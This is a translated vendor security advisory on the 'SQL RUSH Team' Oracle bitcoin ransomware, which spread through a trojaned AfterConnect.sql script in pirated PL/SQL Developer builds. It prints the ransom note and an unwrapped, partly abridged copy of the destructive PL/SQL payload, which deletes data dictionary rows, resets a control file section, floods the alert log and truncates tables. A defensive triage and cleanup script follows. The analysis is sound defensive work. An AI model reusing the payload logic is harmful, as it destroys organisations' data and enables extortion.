Know Yourself and Know Your Enemy: Demystifying and Preventing the Oracle Bitcoin Ransomware Incident

Abstract: Risk is never mere imagination or jumping at shadows; it arrives the moment you let your guard down. Recently the Oracle databases of many users in China were suddenly hit by an attack that nobody could explain at first. Everyone guessed, probed and tried again, and a small data panic followed.
After noticing these incidents we immediately set about collecting cases and analysing them, and we found the root cause. Yesterday we issued a comprehensive early warning; today we go through the problem in detail once more and share it with Oracle users so that they stay alert.
The main cause of the recent incidents is that some users downloaded database management tools from unknown sources, and those tools infected their databases. We strongly recommend that everyone take copyright seriously, buy genuine software, stay away from risk, and start with the basics.
Symptoms of the problem:
Many users discovered the problem when logging in to the database: the application popped up a "locked" message demanding that 5 bitcoins be sent to the attacker to unlock it.
On the client side you may see an error like the one below, and after the attack the database alert log is flooded with the same ransom text:
ORA-00604: error occurred at recursive SQL level 1
ORA-20315: your database has been SQL RUSH Team lock and send 5 bitcoins to this address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case matching) and then mail your Oracle SID to sqlrush@mail.com and we will let you know how to unlock your database
Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
ORA-06512: at "XXX.DBMS_CORE_INTERNAL", line 27
ORA-06512: at line 2
This is nothing more than a warning plus extortion, but the "SQL RUSH Team" signature and the sqlrush@mail.com address set off all kinds of speculation about who is behind it; the facts are, of course, unknown.
Cause of the problem:
We analysed the cause and the infection process in detail through the limited number of cases available, and disclose it here for Oracle users' reference.
Note: once a problem is properly understood there is no longer any reason for fear; fear comes from the unknown. Before the cause was found, everyone's guesses inflated the problem. Now we can return to its essence.
The root cause is this: a user downloads a pirated PL/SQL Developer from the Internet (especially the various "green" portable and cracked builds) and is trojaned by that tool. So the problem has little to do with Oracle itself, and it is nothing as sophisticated as an injection attack. But as soon as you use the tool, its malicious script runs with the privileges of whatever database user you connect as.
The important point must be said three times: pirated software harms people!
The popularity of PL/SQL Developer in China, and of pirated copies of it, is beyond doubt. The installation directory of this tool contains a script file named AfterConnect.sql, and this script is the real problem.
In a genuine installation this script file is empty, but the injected file contains a series of JOB definitions, stored procedures and trigger definitions, and these are the source of the disaster.
The infected AfterConnect.sql begins by disguising itself as ordinary login.sql content, with clear and innocuous-looking comments.
The substantive content is stored in wrapped (obfuscated) form, so users cannot read it, but it can be recovered with an unwrap tool (be careful, though, that the unwrap tool you use does not itself carry malicious code).
Without doubt the attacker is very familiar with Oracle. After unwrapping, the core of the script looks like this (abridged so that it cannot be run as-is):
DECLARE
   DATE1 NUMBER;
BEGIN
   -- Age of the database in days; the payload only fires on databases at least 1200 days old
   SELECT NVL(TO_CHAR(SYSDATE-CREATED),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
      -- Copy the table dictionary (SYS.TAB$) into a table named ORACHK<guid> in the SYSTEM tablespace
      EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID(),10)||' tablespace system as select * from sys.tab$';
      -- Delete the dictionary rows of every table not owned by user# 0 (SYS) or user# 38, so the tables "vanish"
      DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38));
      COMMIT;
      EXECUTE IMMEDIATE 'alter system checkpoint';
      -- Undocumented call that clears a control file record section
      SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
      -- Flood the alert log (KSDWRT destination 2) with the ransom note
      FOR I IN 1..2046 LOOP
         DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
         DBMS_SYSTEM.KSDWRT(2, 'Your database has been locked by SQL RUSH Team, send 5 bitcoins to this address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case consistent) Oracle SID mailing address sqlrush@mail.com and we will let you know how to unlock your database');
      END LOOP;
   END IF;
END;
Note the attacker's professionalism. At the beginning of the program there is this check:
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
That is, it only acts once the database is more than 1200 days old. The check is quite calculated: small or newly created databases hold little data that matters, so the attacker plays a long game to catch the big fish first. If your database has not yet blown up, it may simply be that its time has not come.
We strongly recommend that users audit which database tools are in use and avoid tools of unknown origin.
We strongly recommend: use genuine software to avoid unknown risks.
Security vulnerability:
Almost all database client tools can run user-defined scripts when connecting, and those scripts are often one of the weak points. The attack in this case is very crude, but also very ingenious.
Downloading tools, localisations or cracks of unknown origin is taboo. The script locations of common client tools are listed below and deserve attention:
SQL*Plus: glogin.sql / login.sql
TOAD: toad.ini
PL/SQL Developer: login.sql / afterconnect.sql
We strongly recommend that users tighten database privilege control, isolate production from test environments, and strictly control development and operations tools.
Disposal suggestion:
The attack coordinates JOBs, triggers and stored procedures, so if a database hits this problem you can set the initialisation parameter job_queue_processes to 0 to stop JOBs from executing, then restart the database and clean up the injected objects. These objects may include the following stored procedures and triggers of the same name:
PROCEDURE "DBMS_CORE_INTERNAL"
PROCEDURE "DBMS_SYSTEM_INTERNAL"
PROCEDURE "DBMS_SUPPORT_INTERNAL"
The core attack code also contains a statement that truncates the connected user's tables:
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
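As an added example (not from the original article and not Cloud and Enmo's own tooling), the following SQL*Plus script run as SYSDBA turns the disposal steps above into concrete checks and cleanup statements. It assumes the three object names listed above, the ORACHK<guid> copy of SYS.TAB$ that the unwrapped payload creates, and a logon or DDL trigger as the persistence mechanism (an assumption; the article only says triggers are involved). The excluded-owner list in the wrapped-source query and the placeholder &schema (a SQL*Plus substitution variable for the tool user's schema) are also assumptions to be adjusted after reviewing the output.

```sql
-- Added triage script (example, not the article's code). Run as SYSDBA in SQL*Plus;
-- review every result set before running the cleanup section.

-- 1. Is the payload condition met? It only fires on databases at least 1200 days old.
SELECT name,
       created,
       TRUNC(SYSDATE - created) AS age_days,
       CASE WHEN SYSDATE - created >= 1200 THEN 'PAYLOAD CONDITION MET'
            ELSE 'below 1200-day threshold' END AS payload_status
  FROM v$database;

-- 2. Stop the job queue so a scheduled JOB cannot fire while we investigate.
ALTER SYSTEM SET job_queue_processes = 0 SCOPE = BOTH;

-- 3. The procedures the article names, plus any triggers of the same name.
SELECT owner, object_type, object_name, created, last_ddl_time, status
  FROM dba_objects
 WHERE object_name IN ('DBMS_CORE_INTERNAL', 'DBMS_SYSTEM_INTERNAL', 'DBMS_SUPPORT_INTERNAL')
 ORDER BY owner, object_type, object_name;

-- 4. Wrapped PL/SQL in non-Oracle schemas: the dropper ships its body wrapped, and the
--    first stored source line of a wrapped unit carries the keyword "wrapped".
--    (The excluded-owner list is an assumption; extend it for your installation.)
SELECT owner, type, name
  FROM dba_source
 WHERE line = 1
   AND LOWER(text) LIKE '% wrapped%'
   AND owner NOT IN ('SYS', 'SYSTEM', 'XDB', 'MDSYS', 'CTXSYS', 'ORDSYS', 'WMSYS', 'DBSNMP', 'OLAPSYS')
 ORDER BY owner, type, name;

-- 5. Jobs that would invoke the injected procedures.
SELECT job, log_user, schema_user, what, next_date, broken
  FROM dba_jobs
 WHERE UPPER(what) LIKE '%DBMS_%_INTERNAL%';

-- 6. Logon, DDL and startup triggers outside SYS/SYSTEM (assumed persistence mechanism).
SELECT owner, trigger_name, trigger_type, triggering_event, status
  FROM dba_triggers
 WHERE owner NOT IN ('SYS', 'SYSTEM')
   AND (triggering_event LIKE '%LOGON%'
        OR triggering_event LIKE '%DDL%'
        OR triggering_event LIKE '%STARTUP%');

-- 7. The payload copies SYS.TAB$ into ORACHK<guid> before deleting from it; those copies
--    are the raw material for dictionary recovery, so list them and do not drop them.
SELECT owner, object_name, created
  FROM dba_objects
 WHERE object_type = 'TABLE'
   AND object_name LIKE 'ORACHK%';

-- 8. Cleanup, only after confirming the objects above are not legitimate.
--    &schema is the tool user's schema found in step 3 (SQL*Plus substitution variable).
BEGIN
  -- DBMS_JOB.REMOVE only removes the caller's own jobs; SYS uses DBMS_IJOB for other users' jobs.
  FOR j IN (SELECT job FROM dba_jobs WHERE UPPER(what) LIKE '%DBMS_%_INTERNAL%') LOOP
    SYS.DBMS_IJOB.REMOVE(j.job);
  END LOOP;
  COMMIT;
END;
/
DROP TRIGGER &schema..DBMS_CORE_INTERNAL;
DROP TRIGGER &schema..DBMS_SYSTEM_INTERNAL;
DROP TRIGGER &schema..DBMS_SUPPORT_INTERNAL;
DROP PROCEDURE &schema..DBMS_CORE_INTERNAL;
DROP PROCEDURE &schema..DBMS_SYSTEM_INTERNAL;
DROP PROCEDURE &schema..DBMS_SUPPORT_INTERNAL;

-- 9. Re-enable the job queue once the database is clean. 10 is only an example value;
--    restore whatever your instance used before step 2.
ALTER SYSTEM SET job_queue_processes = 10 SCOPE = BOTH;
```

The wrapped-source query in step 4 will also list legitimate vendor packages that happen to be wrapped, which is why the owner exclusion list matters; treat every hit in a developer or application schema as suspect until its source is accounted for. The double period in &schema..NAME is deliberate: SQL*Plus consumes the first period as the terminator of the substitution variable, leaving the second as the schema separator.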
If your database has been attacked and data has been lost, contact the Cloud and Enmo service team urgently; we can help with data restoration. Cloud and Enmo's proven ODU product can recover as much data as possible after a loss. Cloud and Enmo's automated inspection tool, Bethune, includes built-in checks that analyse access sources and access tools and can help you map out how your database is actually used. Try it free of charge at https://bethune.enmotech.com.
Event review:
In September 2015 the XcodeGhost compromise of Apple's iOS ecosystem shocked the industry. Unknown attackers implanted malicious code into Xcode, the iOS application development tool, and spread it through file-sharing sites and forums; apps built with the trojaned Xcode harvested Apple users' information. Data from several security teams showed that 76 of the 5,000 most downloaded apps in the App Store were infected, and the number of affected users was conservatively estimated at over 100 million.
In February 2012 a Chinese-localised version of PuTTY and other SSH remote management tools were found to contain a backdoor that silently captured the SSH usernames and passwords administrators typed and sent them to a designated server.
